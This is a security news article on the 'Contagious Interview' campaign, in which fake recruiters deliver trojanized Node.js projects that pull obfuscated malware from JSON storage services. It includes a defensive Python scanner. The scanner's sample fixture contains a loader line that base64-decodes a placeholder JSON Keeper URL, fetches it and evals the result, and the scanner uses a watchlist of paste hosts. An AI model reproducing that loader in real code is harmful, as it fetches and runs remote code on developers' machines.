Threat Actors Leverage JSON Storage Services to Host and Deliver Malware Via Trojanized Code Projects

Cybersecurity researchers have uncovered a sophisticated campaign where threat actors abuse legitimate JSON storage services to deliver malware to software developers.

The campaign, known as Contagious Interview, represents a significant shift in how attackers are concealing malicious payloads within seemingly legitimate development projects.

By exploiting platforms such as JSON Keeper, JSONsilo, and npoint.io, threat actors have found a way to blend malicious code delivery into legitimate traffic, making detection increasingly difficult.

The Contagious Interview campaign has been active since at least 2023 and is aligned with Democratic People’s Republic of Korea (DPRK) actors.

The operation specifically targets software developers across Windows, Linux, and macOS systems, with particular focus on those working in cryptocurrency and Web3 projects.

The attackers’ goal is financial gain, aiming to steal sensitive information and digital assets from victims.

Initial access is gained through meticulously crafted social engineering tactics, where fake recruiters approach potential victims on job searching platforms like LinkedIn with compelling job opportunities.

The attack typically begins with a professionally crafted message from a fake recruiter claiming to represent a legitimate company working on real estate or Web3 projects.

Overview of the Contagious Interview malware campaign (Source – NVISO Labs)

After several messages exchanging pleasantries and discussing the role, the recruiter shares a demo project hosted on GitLab or GitHub as part of an interview assessment.

NVISO Labs security analysts identified that this approach successfully tricks developers into downloading and executing trojanized code.

Attack Mechanism

The demo projects appear legitimate, featuring detailed readme files and professional layouts that showcase real estate platforms or cryptocurrency applications, creating a convincing facade.

InvisibleFerret’s Pastebin functionality (Source – NVISO Labs)

Once developers download and run the projects using Node.js, the infection chain begins. The real technical cleverness lies in how the malware is delivered.

Configuration files within these projects contain base64-encoded variables that mask JSON storage service URLs. When decoded, these variables reveal links to JSON Keeper or similar platforms hosting heavily obfuscated JavaScript code.

This code is automatically fetched and executed through legitimate Node.js operations, making it difficult for traditional security tools to catch the attack.
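As an added defender-side example (not NVISO's or the campaign's own code), the following Python triages a Node.js project for the exact pattern described above: base64 string literals that decode to URLs on JSON storage or paste services, and files that base64-decode a value and hand the fetched result to eval. The watchlist, the sample config and the loader file are constructed for this example.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Hosts of the storage and paste services named in the write-up; an assumed
# watchlist for this example, extend it for your own environment.
WATCHLIST = ("jsonkeeper", "jsonsilo", "npoint.io", "pastebin", "railway")

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# "base64-decode something, then hand it to eval / new Function" in one file
DECODE_AND_EVAL = re.compile(r"from\(.+?['\"]base64['\"]\)[\s\S]*?(eval\(|new Function\()")

def decode_if_url(token):
    """Return the decoded text if the base64 token hides an http(s) URL, else None."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if re.match(r"^https?://", text) else None

def scan_source(path, text):
    """Summarise one file: hidden URLs, watchlist hits, decode-then-eval pattern."""
    urls = [u for u in (decode_if_url(m.group(0)) for m in B64_TOKEN.finditer(text)) if u]
    hosts = [(urlparse(u).hostname or "").lower() for u in urls]
    return {"file": path, "hidden_urls": urls,
            "watchlisted": any(w in h for h in hosts for w in WATCHLIST),
            "decode_and_eval": bool(DECODE_AND_EVAL.search(text))}

def scan_project(files):
    """files: {path: source}. Keep only files that deserve a human look."""
    return [r for r in (scan_source(p, t) for p, t in files.items())
            if r["hidden_urls"] or r["decode_and_eval"]]

# Constructed sample project: a config with one "API key" that is really a
# base64-encoded JSON Keeper URL (placeholder path) and one hex-looking salt
# that is ignored, plus a loader that decodes the key, fetches it and evals it.
HIDDEN_URL = "https://jsonkeeper.com/b/PLACEHOLDER"
SAMPLE_PROJECT = {
    "config.js": 'module.exports = { apiKey: "%s", salt: "3f9a2b7c1d4e5f60718293a4b5c6d7e8" };'
                 % base64.b64encode(HIDDEN_URL.encode()).decode(),
    "loader.js": "const cfg = require('./config');\n"
                 "const url = Buffer.from(cfg.apiKey, 'base64').toString();\n"
                 "require('axios').get(url).then(r => eval(r.data));\n",
}

def demo():
    return scan_project(SAMPLE_PROJECT)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it over a cloned interview project before `npm install` or `node` is ever invoked; a config value that decodes to a watchlisted URL next to a decode-then-eval loader is the combination this campaign relies on.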

The obfuscated JavaScript fetches the BeaverTail infostealer, which specializes in stealing wallet information, system data, and browser extension information related to cryptocurrency.

Following BeaverTail execution, the InvisibleFerret Remote Access Tool is deployed in subsequent stages.

This modular framework, written in Python, carries multiple capabilities, including data exfiltration, system fingerprinting, and downloading additional payloads.

The attack chain continues through multiple stages, utilizing legitimate services like Pastebin and Railway to host payloads and evade detection.

What distinguishes this campaign is the attacker’s sophisticated use of legitimate infrastructure to avoid detection.

By hosting malware through widely used JSON storage services and code repositories, the threat actors ensure their traffic appears normal.

Organizations should exercise extreme caution when receiving unsolicited code from recruiters or any unknown sources.

Inspecting configuration files for suspicious API keys and monitoring Node.js execution behaviors can help identify and prevent similar attacks before the threat establishes itself within the network.
